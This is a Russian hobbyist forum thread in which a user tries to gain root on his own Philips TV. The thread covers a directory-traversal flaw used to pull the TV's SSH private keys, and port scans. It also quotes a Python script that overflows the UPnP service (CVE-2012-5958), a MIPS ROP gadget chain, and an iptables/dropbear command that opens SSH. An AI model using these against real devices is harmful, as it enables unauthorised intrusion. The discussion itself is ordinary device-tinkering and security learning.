Файлы  •  Ссылки  •  Прошивки  •  Правила  •  Архив  •   FAQ  •  Участники  •  Поиск
Регистрация  •  Вход

Кто силен в линуксах!?

Список форумов» Флейм» Технофлейм
АвторСообщение
алеx3
Участник
Сообщения: 3316




17-03-2016 08:23

У меня возможно глупый вопрос а может и наоборот слишком заумный.
Интересует следующие как работает напрмиер команда ls, в плане что и как..., откуда..., начинает запускать--считывать , чтоб вывести мне на экран список дирректорий и файлов.
Существует ли гдето в линуксе файл где прописано все дерево каталогов и файлов в них. если существует то где?

Пытался гуглить но ничего не нашол, везде под пониманием работы каких либо команд в частности ls написано, типа набрав (выполнив) команду вы увидите результат на экране. И все как , оно работает, откуда вычитывает инфу не ясно.
Paidj
Участник
Сообщения: 1352




17-03-2016 09:39

алеx3 писал:
У меня возможно глупый вопрос а может и наоборот слишком заумный.
Интересует следующие как работает напрмиер команда ls, в плане что и как..., откуда..., начинает запускать--считывать , чтоб вывести мне на экран список дирректорий и файлов.
Существует ли гдето в линуксе файл где прописано все дерево каталогов и файлов в них. если существует то где?

Пытался гуглить но ничего не нашол, везде под пониманием работы каких либо команд в частности ls написано, типа набрав (выполнив) команду вы увидите результат на экране. И все как , оно работает, откуда вычитывает инфу не ясно.

Дерево файловой системы строится каждый раз заново, в ОЗУ. Некоторые каталоги (например /DEV) вообще пустые при неактивной системе.
master-X79
Участник
Сообщения: 4624




17-03-2016 09:39

алеx3, Сань, для этого есть файловая система. Почитай http://sonikelf.ru/kornevaya-fajlovaya-sistema-linux-osnovnye-katalogi ...
алеx3
Участник
Сообщения: 3316




17-03-2016 10:37

Paidj писал:
Дерево файловой системы строится каждый раз заново, в ОЗУ. Некоторые каталоги (например /DEV) вообще пустые при неактивной системе.

Paidj писал:
Некоторые каталоги (например /DEV) вообще пустые при неактивной системе.

просто не примонтировано в них ничего
master-X79, ну нет там что я хочу узнать , описание для пользователе мол есть команда cd для перехода по каталогам,
есть команда ls для обзора директорий ,

Счас про иноды нагуглил уже ближе ,
Цитата:
каждый файл в Unix описывается с помощью
уникального inode (их, кстати, ещё называют индексами, далее я тоже
буду называть inode индексом, лень знаете ли постоянно переключать
раскладки :-) ) В индексе содержится информация определённого рода
(права доступа, размер, имя владельца, и т.д.). Как было сказано выше,
индексы живут на диске, но при работе с ними ядро создаёт их копии в
памяти


и вот где хранится эта таблица? где путь к файлу сопостовляется к его иноду.
или как таже команда ls узнает что за файлы лежат в папке X
vlad08
Предупреждений: 1
Предупреждений: 1 
Сообщения: 177




17-03-2016 13:59

алеx3, Посмотри , там много интересного.
http://www.opennet.ru/man.shtml?topic=ls&category=1&russian=0
master-X79
Участник
Сообщения: 4624




17-03-2016 15:13

алеx3 писал:
master-X79, ну нет там что я хочу узнать , описание для пользователе мол есть команда cd для перехода по каталогам,
есть команда ls для обзора директорий


Тогда тебе надо разбираться с файловой системой на низком уровне http://www.ibm.com/developerworks/ru/library/l-linux-filesystem/index. ...
uam
Участник
Сообщения: 2075




17-03-2016 21:30

алеx3 писал:
Пытался гуглить но ничего не нашол,

А Wiki?

#наконец дерево катологов рекурсивно
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
алеx3
Участник
Сообщения: 3316




18-03-2016 11:07

uam, Вы меня не поняли ,
я хотел найти описание где почитать как работает команда ls на низком уровне чтоли.
а не как набрать в командной строке эту команду с разными вариантами её опций.

Поясню зачем мне это надо, есть устройство , где я могу если знаю путь к файлу скачать его через сеть.

но если я не знаю путь к файлу то я ничего не могу скачать.
так вот возможно есть какойто файл в файловой системе где можно посмотреть ссылки на файлы.
и этот файл является стандартным в файлофых системах linux как например /etc/proc etc/passwd
uam
Участник
Сообщения: 2075




18-03-2016 14:21

Я в nix совсем слаб.
Но теперь еще меньше понял.
Если через сеть, то как примонтирована удаленная файловая система?
алеx3
Участник
Сообщения: 3316




18-03-2016 14:52

устройство мое филипс тв ,
есть "дырка" в старых версиях ПО по ссылке она описана
http://sitsec.net/blog/2013/09/16/jointspace-server-directory-traversa ...

Вот через эту "дырку" формирую HTTP запросы на своей машине , можно скачивать файлы из файловой системы телика.
Но в слепую
Paidj
Участник
Сообщения: 1352




18-03-2016 15:59

алеx3 писал:
устройство мое филипс тв ,
есть "дырка" в старых версиях ПО по ссылке она описана
http://sitsec.net/blog/2013/09/16/jointspace-server-directory-traversa ...

Вот через эту "дырку" формирую HTTP запросы на своей машине , можно скачивать файлы из файловой системы телика.
Но в слепую

Если упоминается "Reading host's SSH keys" может просто попытаться приконектится по SSH???
алеx3
Участник
Сообщения: 3316




18-03-2016 17:43

Только знать ещебы через какой порт и ли как еще,
а так пытался но возможно не получилось потому-что до этого никогда не делал такого. пишет что 22 порт по таймауту отключился.

ключи RSA скачал и приватный и публичный
Paidj
Участник
Сообщения: 1352




18-03-2016 18:52

алеx3 писал:
Только знать ещебы через какой порт и ли как еще,
а так пытался но возможно не получилось потому-что до этого никогда не делал такого. пишет что 22 порт по таймауту отключился.

ключи RSA скачал и приватный и публичный

А в /etc конфига под sshd случаем не валяется?
Как вариант попытаться сконектится по ssh через UART.
алеx3
Участник
Сообщения: 3316




18-03-2016 18:59

Paidj писал:
А в /etc конфига под sshd случаем не валяется?

наверняка есть , нужно точно знать название, для того и хотел найти как знать имена папок файлов и их пути в системе, тогда вычитаю

Paidj писал:
сконектится по ssh через UART.

это интересно а как? еепром в режиме JettMode можно через уарт сливать, компаировской прогой.

Много ссылок на файлы подсмотрел в логах по UART
например деморолик фирменный от филипса серфингисты где.
https://yadi.sk/i/M9Vm8ASCqFGho
Paidj
Участник
Сообщения: 1352




18-03-2016 19:55

алеx3 писал:
наверняка есть , нужно точно знать название, для того и хотел найти как знать имена папок файлов и их пути в системе, тогда вычитаю

Я так понимаю /etc/ssh/sshd_config некатит???
А на счёт UART я имел ввиду что конект через него предусмотрен в стандартном ssh, а вот слушает ли он его в конкретном случае(особенно если порт занят другим демоном) большая загадка.
Кстати, если к телику доступаешся по сети может сканирование портов сделать, например nmap???
алеx3
Участник
Сообщения: 3316




18-03-2016 20:06

Paidj писал:
Я так понимаю /etc/ssh/sshd_config некатит???
А на счёт UART я имел ввиду что конект через него предусмотрен в стандартном ssh, а вот слушает ли он его в конкретном случае(особенно если порт занят другим демоном) большая загадка.
Кстати, если к телику доступаешся по сети может сканирование портов сделать, например nmap???

да sshd_config и ssh_config не видет или нет этих файлов, скорее както по другому обозваны или лежат гдето в другом месте.
с винды запускал Zenmap мне показалося что он больше нашол портов открытых
в скрепке приложил,

а чем putty ssh через терминал делать? в джет моде очень запросто может и достучуся.


есть исходники на этот тв , может в них можно что-то подсмотреть?

  201603131745 Intense scan, all TCP ports на 192.168.105.136.rar  3,4 КБ  Скачано: 33 раз(а)

алеx3
Участник
Сообщения: 3316




18-03-2016 21:11

Через порт 2323 принял соединение с zoc-терминала подключался по ssh но как то не понятно принять принял, в логах написал Accepted connection from '192.168.105.80' и все никаких действий консоль не дает вводить.
Paidj
Участник
Сообщения: 1352




18-03-2016 23:20

алеx3 писал:
Через порт 2323 принял соединение с zoc-терминала подключался по ssh но как то не понятно принять принял, в логах написал Accepted connection from '192.168.105.80' и все никаких действий консоль не дает вводить.

Кстати помимо ssh надо проверить и возможность поддержки Telnet терминала.
В качестве клиента действительно пользую putty, исключительно за то что там всё в одном флаконе
алеx3
Участник
Сообщения: 3316




13-04-2016 23:00

нарыл сайтик http://connect.ed-diamond.com/MISC/MISC-075/Televisions-connectees-des ... где вроди как все разжовано как ROOT доступ к телику через SSH получить, но разжовано не для простых смертных, может кто соображающий подскажет что к чему?
Paidj
Участник
Сообщения: 1352




14-04-2016 11:20

алеx3 писал:
нарыл сайтик http://connect.ed-diamond.com/MISC/MISC-075/Televisions-connectees-des ... где вроди как все разжовано как ROOT доступ к телику через SSH получить, но разжовано не для простых смертных, может кто соображающий подскажет что к чему?

Чтиво увлекательное, но готового решения там нет. Точнее там перечислены найденные уязвимости и что можно с помощью них получить.
Кстати если цель получить имена файлов, то вроде механизм распаковки обновления описан достаточно подробно, в результате были получены образы разделов.
алеx3
Участник
Сообщения: 3316




14-04-2016 15:44

Paidj, ты уверен что нет готового решения там? ну не на уровни скрипта готового , а описания как переполнить стек , заставить выполнится нужный нам код и получить root
вот 4.1.1.3 EXPLOITATION и все что ниже , до примера где подключаются по SSH.
тот кто писал статью точно получил доступ через SSH.

Цитата:
#!/usr/bin/python
import socket
pkt = "NOTIFY * HTTP/1.1\r\n" +\
"HOST: 239.255.255.250:1900\r\n" +\
"USN:uuid:schemas:device:" +\
"A" * 512 + ":end\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(pkt, ('239.255.255.250', 1900))


сей скрипт работает переполняет стек, и телик ребутится , все как в статье написано,

а вот как исполнить примеры что в статье
Цитата:
Cette chaine profite de la restauration des registres lors de l'epilogue de la fonction vulnerable pour y placer les adresses des gadgets.

lw $ra, 0x15C($sp) # @gadget_1
lw $s3, 0x158($sp)
lw $s2, 0x154($sp) # @system()
lw $s1, 0x150($sp) # @gadget_2
lw $s0, 0x14C($sp) # @gadget_3
jr $ra # debut de l'exploitation
addiu $sp, 0x160
Le premier gadget de chaine copie l'adresse de la fonction system() dans $a3, et saute sur le gadget suivant.

move $a3, $s2 # @system()
lw $a1, 4($s0)
move $t9, $s1 # @gadget_2
jalr $t9
lw $a2, 8($s0)
Le second gadget fait pointer $a1 vers la commande systeme sur la pile, peu apres la chaine de ROP, et saute sur le gadget suivant.

addiu $a1, $sp, 0x18# commande systeme
move $t9, $s0 # @gadget_3
jalr $t9
move $a2, $zero
Le dernier copie $a1 dans $a0 et appelle la fonction system().

move $t9, $a3 # @system()
jalr $t9
move $a0, $a1 # commande systeme (branch delay slot)
La commande systeme que nous executons profite de la presence du binaire Dropbear pour ouvrir un acces SSH :
для меня как чайника в этих вопросах загадка,
Paidj
Участник
Сообщения: 1352




14-04-2016 16:23

на сколько я понял основная задача не root, а выполнить комманду
Цитата:
/ SBIN / Iptables -A ВВОД -p TCP -m TCP --dport 22 J ACCEPT; / Usr / SBIN / -F Dropbear

Если всё так, то получается что sshd запущен, но его порт зарублен через Iptables.
В статье же указанны инструменты mipsrop [11] и ROPgadget [12] с помощью которых формировали скрипт
алеx3
Участник
Сообщения: 3316




14-04-2016 16:49

Paidj, так вот это
Цитата:
/sbin/iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT ; /usr/sbin/dropbear -F


я так понял выполнили через уязвимость на телике да?
чтоб открыть порт 22

Добавлено 14-04-2016 17:52

Вообщето если есть возможность получить доступ root в систему телика , то очень хочется это сделать,
master-X79
Участник
Сообщения: 4624




14-04-2016 17:09

алеx3, так iptables вроди как и работает только через root ...
Paidj
Участник
Сообщения: 1352




14-04-2016 17:14

алеx3 писал:
Paidj, так вот это
Цитата:
/sbin/iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT ; /usr/sbin/dropbear -F


я так понял выполнили через уязвимость на телике да?
чтоб открыть порт 22

Добавлено 14-04-2016 17:52

Вообщето если есть возможность получить доступ root в систему телика , то очень хочется это сделать,

Я понял так: в сервисе UPnP есть косяк, отправкой нескольких пакетов(в 3 шага) мы можем вызвать выполнение комманды
Цитата:
/sbin/iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT ; /usr/sbin/dropbear -F

после этого можно конектится по SSH. Опять же на сколько я понял в системе все службы и так выполняются от лица root (в нарушении всех норм безопасности), поэтому когда мы вызываем переполнение стека dlnaApp(отвечающей за UPnP) у нас уже есть полномочия root
алеx3
Участник
Сообщения: 3316




14-04-2016 18:03

Paidj писал:
в сервисе UPnP есть косяк, отправкой нескольких пакетов(в 3 шага) мы можем вызвать выполнение комманды

Вот да ,
хочу разобраться как их эти пакеты отправить,
moroz.v
Участник
Сообщения: 113




14-04-2016 18:35

Через переводчик:
https://translate.google.ru/translate?hl=ru&sl=fr&u=http://con ...
алеx3
Участник
Сообщения: 3316




14-04-2016 19:06

moroz.v, у меня хром на лету переводит, еслиб дело в переводчике было , тут с нуля прокурить нужно толмудов кучу.
Paidj
Участник
Сообщения: 1352




14-04-2016 20:24

алеx3 писал:
Paidj писал:
в сервисе UPnP есть косяк, отправкой нескольких пакетов(в 3 шага) мы можем вызвать выполнение комманды

Вот да ,
хочу разобраться как их эти пакеты отправить,

Я же говорил "инструкции" там нет, примерно так описывают устройство ядрёной бомбы в учебниках по физике: вроде всё понятно, но повторить с ходу невозможно.
Исходные данные у нас следующие:
Нам надо выполнить "атаку переполнения буфера на архитектуре MIPS".
Уязвимость которую мы можем эксплуатировать - при реализации сервиса UPnP использована уязвимая версии библиотеки libupnp известная по бюллетеню CVE-2012-5958, об уязвимости сообщил пользователь известный как Rapid7.
В статье, при реализации атаки использованы инструменты mipsrop [11] и ROPgadget [12] ссылки на описание которых есть в конце статьи.

После осмысления материала по перечисленным темам наверняка удастся осуществить задуманное.
алеx3
Участник
Сообщения: 3316




14-04-2016 22:38

алеx3 писал:
lw $ra, 0x15C($sp) # @gadget_1
lw $s3, 0x158($sp)
lw $s2, 0x154($sp) # @system()
lw $s1, 0x150($sp) # @gadget_2
lw $s0, 0x14C($sp) # @gadget_3
jr $ra # debut de l'exploitation
addiu $sp, 0x160

ну вообщето это я так понял уже и есть цепочка этих гаджетов, вытянутая из наверное распакованой прошивки, инструментами mipsrop [11] и ROPgadget [12] ,
Список форумов» Флейм» Технофлейм» Кто силен в линуксах!?
Перейти:  
Текущий раздел» Флейм» Технофлейм (Различные обсуждения на технические темы)








Информация по ремонту для специалистов - справочники, инструкции, энциклопедия, советы и секреты ремонта,  настройка, сервисные режимы
Powered by phpBB 2.0.18 © 2001, 2002 phpBB Group!